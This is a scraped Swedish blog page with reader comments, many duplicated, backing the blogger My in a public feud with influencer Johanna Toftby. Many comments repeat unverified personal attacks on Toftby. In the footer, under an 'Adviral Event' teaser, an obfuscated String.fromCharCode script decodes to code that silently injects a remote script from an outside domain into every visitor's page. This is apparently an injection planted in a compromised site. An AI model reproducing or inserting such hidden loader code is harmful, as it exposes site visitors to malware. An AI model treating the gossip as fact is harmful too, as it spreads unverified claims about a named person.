 139. Ja jag slutade följa Johannas Blogg för länge sedan, känner att hon är så himlens ytlig och att precis allt ska cirkulera runt henne, hon gjorde något Bloggreportage från Barcelona där hon bombarderade bloggen med hundratals foton på sig själv, jag skrev lite olika tips på ställen att besöka då jag är gift med en spanjor och har varit i Barcelona massor av gånger men upptäckte då att jag inte längre kunde skriva i hennes blogg, efter det tog jag bort hennes blogg och fb sida , det kanske blev obekvämt med någon annan som hade tips och ideer?? har faktiskt inte varit med om det förut, men som sagt när jag läser ditt inlägg så förstår jag att jag hade lite rätt i mina aningar om att hon vill regera ensam i media osv. 🙁 bra My !! <3

 140. Jag har aldrig läst Johannas blogg så jag har ingen uppfattning om henne. Däremot har jag följt din blogg i några månader och du verkar vara en mysig och snäll tjej som vet vad du vill. Ignorera Johanna och låt inte henne och hennes anhang stjäla din energi.

 141. Ojoj….
  Ja de verkar som om hon får säga va hon tycker och tänker, såg i hennes om de var blogg eller på instagram att någon hade sagt att janne inte va snygg i håret och att man minsann inte fick säga så kopierat direkt från hennes insta:
  Tycker det är töntigt att tala om att någon var ”ful i håret” innan. Sånt skulle ni aldrig gå fram och säga face to face.
  Exakt så skrev hon på sitt instagram.
  Men att hon får ta tag i My´s hår och säga att hennes löshår är fult det är okey..
  Börjat i sommras/sen vår att läsa din blogg och jag gillar den, bjuder på en härlig blandning och även sanningar..
  Kram till dig

 142. Hej My!
  Jag förstår att du ledsnar till slut, vem skulle inte göra det. Jag kan trösta dig med att vi är många som av egen erfarenhet känner till att JT är en oerhört mediakåt tjej som kan gå över lik för att bli en A-kändis. Att se ner på andra är vardagsmat för JT och även att ge pekpinnar till andra både om hur de ser ut, vad de äter, dricker och när/hur ofta de dricker. Sådana människor borde kanske tänka på att inte kasta sten när man själv sitter i glashus. Efter att ha utdelat de svidande pekpinnarna så kan man ju alltid avsluta hela den nedvärderande synpunkten med att ”fast vi är ju alla olika”. Självklart är man också världens bästa frisör när man gått Komvux variant av frisörutbildningen. Hur många samarbetspartners har hon hittills avverkat och det kommer att bli många fler i den raden var så säkra. Stå emot och strunta i sådana nollor för hon ligger ändå bara på sandlådenivå.
  Kram på dig och fortsätt ge av din positiva energi!!!

 143. Jag var på hennes bloggträff och hon snäste av mig och min mamma när vi vänligt frågade om hon kunde fota oss. Sen har jag klippt mig hos henne och det var sista gången.. inte vidare ödmjuk kvinna tyvärr.

 144. Fy fasen vad du är grym som vågar gå ut med detta! Hon är ju så mediakåt så hon gör vad som helst för att komma vidare i sitt ”kändisskap”. Dom som säger att Johanna är en trevlig och god person har rätt i det… i och med att hon är trevlig mot dom HON vill, dom Hon har vinning av. Resten ger hon blankaste f-n i…Precis som nån skrev innan att först är hon bästis med den ena och den andra och sen ser man dom eller aldrig hör om dom mer..nä för att hon klättrar över lik för och komma dit hon vill. Även Janne kommenterar sjukt nedvärderande och idiotförklarar J läsare när dom inte har samma åsikter som henne…. Heja heja My

 145. Ojoj….

  Ja de verkar som om hon får säga va hon tycker och tänker, såg i hennes om de var blogg eller på instagram att någon hade sagt att janne inte va snygg i håret och att man minsann inte fick säga så kopierat direkt från hennes insta:

  Tycker det är töntigt att tala om att någon var ”ful i håret” innan. Sånt skulle ni aldrig gå fram och säga face to face.

  Exakt så skrev hon på sitt instagram.
  Men att hon får ta tag i My´s hår och säga att hennes löshår är fult det är okey..

  Börjat i sommras/sen vår att läsa din blogg och jag gillar den, bjuder på en härlig blandning och även sanningar..
  Kram till dig

 146. Hej My!
  Jag förstår att du ledsnar till slut, vem skulle inte göra det. Jag kan trösta dig med att vi är många som av egen erfarenhet känner till att JT är en oerhört mediakåt tjej som kan gå över lik för att bli en A-kändis. Att se ner på andra är vardagsmat för JT och även att ge pekpinnar till andra både om hur de ser ut, vad de äter, dricker och när/hur ofta de dricker. Sådana människor borde kanske tänka på att inte kasta sten när man själv sitter i glashus. Efter att ha utdelat de svidande pekpinnarna så kan man ju alltid avsluta hela den nedvärderande synpunkten med att ”fast vi är ju alla olika”. Självklart är man också världens bästa frisör när man gått Komvux variant av frisörutbildningen. Hur många samarbetspartners har hon hittills avverkat och det kommer att bli många fler i den raden var så säkra. Stå emot och strunta i sådana nollor för hon ligger ändå bara på sandlådenivå.
  Kram på dig och fortsätt ge av din positiva energi!!!

 147. Jag var på hennes bloggträff och hon snäste av mig och min mamma när vi vänligt frågade om hon kunde fota oss. Sen har jag klippt mig hos henne och det var sista gången.. inte vidare ödmjuk kvinna tyvärr.

 148. Fy fasen vad du är grym som vågar gå ut med detta! Hon är ju så mediakåt så hon gör vad som helst för att komma vidare i sitt ”kändisskap”. Dom som säger att Johanna är en trevlig och god person har rätt i det… i och med att hon är trevlig mot dom HON vill, dom Hon har vinning av. Resten ger hon blankaste f-n i…Precis som nån skrev innan att först är hon bästis med den ena och den andra och sen ser man dom eller aldrig hör om dom mer..nä för att hon klättrar över lik för och komma dit hon vill. Även Janne kommenterar sjukt nedvärderande och idiotförklarar J läsare när dom inte har samma åsikter som henne…. Heja heja My

 149. Hej My du är så bra, så bra skrivet, äntligen någon som vågar säga ifrån, har läst så mycket skit om dig, från andra läsare mest. så tråkigt. du verkar genomgo tjej, ödmjuk, mysig och ärlig, det lyser igenom tro mig. Heja heja dig

 150. Hej My du är så bra, så bra skrivet, äntligen någon som vågar säga ifrån, har läst så mycket skit om dig, från andra läsare mest. så tråkigt. du verkar genomgo tjej, ödmjuk, mysig och ärlig, det lyser igenom tro mig. Heja heja dig

 151. <3
  Modigt och bra av dig My. Man förstår att du tyvärr inte är ensam om att bli illa behandlad av henne. Det syns på kommentarerna. Många har ju även på bloggavstånd uppfattat henne precis som du beskriver. Så härligt att du säger ifrån. Man ska prata om det. Precis som med annan mobbing så bör det fram i ljuset och granskas.
  Önskar dig allt gott och att du nu får lugn och ro.
  /Bea

 152. <3
  Modigt och bra av dig My. Man förstår att du tyvärr inte är ensam om att bli illa behandlad av henne. Det syns på kommentarerna. Många har ju även på bloggavstånd uppfattat henne precis som du beskriver. Så härligt att du säger ifrån. Man ska prata om det. Precis som med annan mobbing så bör det fram i ljuset och granskas.
  Önskar dig allt gott och att du nu får lugn och ro.
  /Bea

 153. Med ödmjukhet kommer man långt, har också fått vissa vibbar på j:s blogg därför valt att inte följa….lite synd ändå med alla påhopp tycker jag!! Men du ska inte ta massa skit My – stå på dig och va rädd om dig , tack för en fin o inspirerande blogg

 154. Jag träffade Johanna och Janne på en av deras resor. Jag var helt ovetandes om att hon var ”känd”, då jag inte följt EMS. Utan trodde att dessa två var ett par som ”vem som helst”. Vi hade i alla fall mycket trevligt, tills jag började inse att hon drog fler och fler kommentarer som var ”översittarattityd”. Bland annat så frågade jag(som man brukar) vad dessa jobbade med. Först var hon journalist åt ett reseföretag, men började viska lite tyst om att hon inte ville få det att låta som hon var kändis. För att ju mer tiden gick försökta skryta om hur känd hon faktiskt var, och hur många gratisresor han faktiskt åker på. Janne var trevlig hela tiden, och när vi skulle skiljas åt(dom reser hem och vi fortsätter vår resa), är det endast Janne som tar i hand och säger trevligt att träffas etc. Johanna hade näsan i vädret och trodde hon var så mycket bättre än alla andra.
  Jag tror verkligen, och hoppas, att fler inser hur hon faktiskt trampar på andra människor för att nå ”toppen”.

 155. Med ödmjukhet kommer man långt, har också fått vissa vibbar på j:s blogg därför valt att inte följa….lite synd ändå med alla påhopp tycker jag!! Men du ska inte ta massa skit My – stå på dig och va rädd om dig , tack för en fin o inspirerande blogg

 156. Jag träffade Johanna och Janne på en av deras resor. Jag var helt ovetandes om att hon var ”känd”, då jag inte följt EMS. Utan trodde att dessa två var ett par som ”vem som helst”. Vi hade i alla fall mycket trevligt, tills jag började inse att hon drog fler och fler kommentarer som var ”översittarattityd”. Bland annat så frågade jag(som man brukar) vad dessa jobbade med. Först var hon journalist åt ett reseföretag, men började viska lite tyst om att hon inte ville få det att låta som hon var kändis. För att ju mer tiden gick försökta skryta om hur känd hon faktiskt var, och hur många gratisresor han faktiskt åker på. Janne var trevlig hela tiden, och när vi skulle skiljas åt(dom reser hem och vi fortsätter vår resa), är det endast Janne som tar i hand och säger trevligt att träffas etc. Johanna hade näsan i vädret och trodde hon var så mycket bättre än alla andra.

  Jag tror verkligen, och hoppas, att fler inser hur hon faktiskt trampar på andra människor för att nå ”toppen”.

 157. Det här är på riktigt det bästa jag läst på länge! Jag känner verkligen inte fröken Toftby men har då och då kikat på hennes instagram och blogg och då förundrats hur någon kan vara så full i sig själv som hon är. Minsta mothugg så gapas det om nät-troll haha Själupptagen, ytlig och extremt otrevlig tycker jag att hon verkar vara..

 158. Det här är på riktigt det bästa jag läst på länge! Jag känner verkligen inte fröken Toftby men har då och då kikat på hennes instagram och blogg och då förundrats hur någon kan vara så full i sig själv som hon är. Minsta mothugg så gapas det om nät-troll haha Själupptagen, ytlig och extremt otrevlig tycker jag att hon verkar vara..

 159. Styrkekramar till dig! Jag älskar att läsa din blogg och jag har arbetat med dig för några år sen innan du medverkade i tv. Du har haft det tufft på många sätt och ändå har du aldrig kastat skit på någon. Du är samma fina MY som du alltid har varit , en tjej med båda fötterna på jorden och som inte är rädd för att visa dina brister. Du inspirerar många att våga. Va rädd om dig fina My <3 Kram Clare

 160. Styrkekramar till dig! Jag älskar att läsa din blogg och jag har arbetat med dig för några år sen innan du medverkade i tv. Du har haft det tufft på många sätt och ändå har du aldrig kastat skit på någon. Du är samma fina MY som du alltid har varit , en tjej med båda fötterna på jorden och som inte är rädd för att visa dina brister. Du inspirerar många att våga. Va rädd om dig fina My <3 Kram Clare

 161. Bor i Skövde och hört från början att hennes mål då hon var med i EMS var att bli jättekänd, kan ju säga hon har ju på ett sätt lyckats. Om man nu kan påstå det är positivt just, men tyckte de stämmer så rätt i det du skrev att det är tydligen skillnad på folk och folk vilka man ska umgås med.
  Hejja dig i alla fall, du verkar ha sånt stort hjärta och vara en sån underbar person och jordnära. Hoppas du slipper ha med dom att göra snart, att de förstår !

 162. Bor i Skövde och hört från början att hennes mål då hon var med i EMS var att bli jättekänd, kan ju säga hon har ju på ett sätt lyckats. Om man nu kan påstå det är positivt just, men tyckte de stämmer så rätt i det du skrev att det är tydligen skillnad på folk och folk vilka man ska umgås med.

  Hejja dig i alla fall, du verkar ha sånt stort hjärta och vara en sån underbar person och jordnära. Hoppas du slipper ha med dom att göra snart, att de förstår !

 163. Brukar nästan aldrig kommentera, men du verkar vara en så fin o ärlig tjej och hoppas du inte tar åt dig av Toftbys kommentarer eller får följder av hennes utspel. Har förut följt henne på Instagram och har inte sett någon tidigare som raderat så mycket kommentarer när det inte passade henne. Mediakåt och kan inte tåla att någon tycker på ett annat sätt än henne själv…sorgligt

 164. Brukar nästan aldrig kommentera, men du verkar vara en så fin o ärlig tjej och hoppas du inte tar åt dig av Toftbys kommentarer eller får följder av hennes utspel. Har förut följt henne på Instagram och har inte sett någon tidigare som raderat så mycket kommentarer när det inte passade henne. Mediakåt och kan inte tåla att någon tycker på ett annat sätt än henne själv…sorgligt

 165. Go My!!
  Vill börja med att säga att Du har en superbra blogg och är en underbar mamma. Så bra skrivet! Hur kan man bete sig så ?? Slutade följa Toftby p g a hennes ytliga blogg, och allt skulle vara så ”fint”… URK.
  Sköt om Dig.
  Kram Maria

 166. Go My!!

  Vill börja med att säga att Du har en superbra blogg och är en underbar mamma. Så bra skrivet! Hur kan man bete sig så ?? Slutade följa Toftby p g a hennes ytliga blogg, och allt skulle vara så ”fint”… URK.

  Sköt om Dig.

  Kram Maria

 167. Hej och tack för en fin blogg! Du verkar vara en sån ärlig och ödmjuk person som står med båda fötterna på jorden trots att du är framgångsrik! Kram fina du/från en läsare

 168. Hej och tack för en fin blogg! Du verkar vara en sån ärlig och ödmjuk person som står med båda fötterna på jorden trots att du är framgångsrik! Kram fina du/från en läsare

 169. Detta har jag helt missat. Hela grejen med er och de elaka kommentarer och påhopp, kanske för att jag inte har tid… men nu hamnade jag här , flera månader efter inläggets publicering, och blir helt chockad. Jag som trodde att hon var snäll… har hört lite elaka saker om henne från folk från Skövde men trodde att de var avundsjuka på henne. Nu förstår jag dock varför de sa som de gjorde. Usch å fy för människor som vill bara vara vän för att gå publicitet ?
  Kram My! Och du… bukplastiken blev hur bra som helst! (Säger en som också gjort en pga otrolig häng)

 170. Detta har jag helt missat. Hela grejen med er och de elaka kommentarer och påhopp, kanske för att jag inte har tid… men nu hamnade jag här , flera månader efter inläggets publicering, och blir helt chockad. Jag som trodde att hon var snäll… har hört lite elaka saker om henne från folk från Skövde men trodde att de var avundsjuka på henne. Nu förstår jag dock varför de sa som de gjorde. Usch å fy för människor som vill bara vara vän för att gå publicitet 🙁
  Kram My! Och du… bukplastiken blev hur bra som helst! (Säger en som också gjort en pga otrolig häng)

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/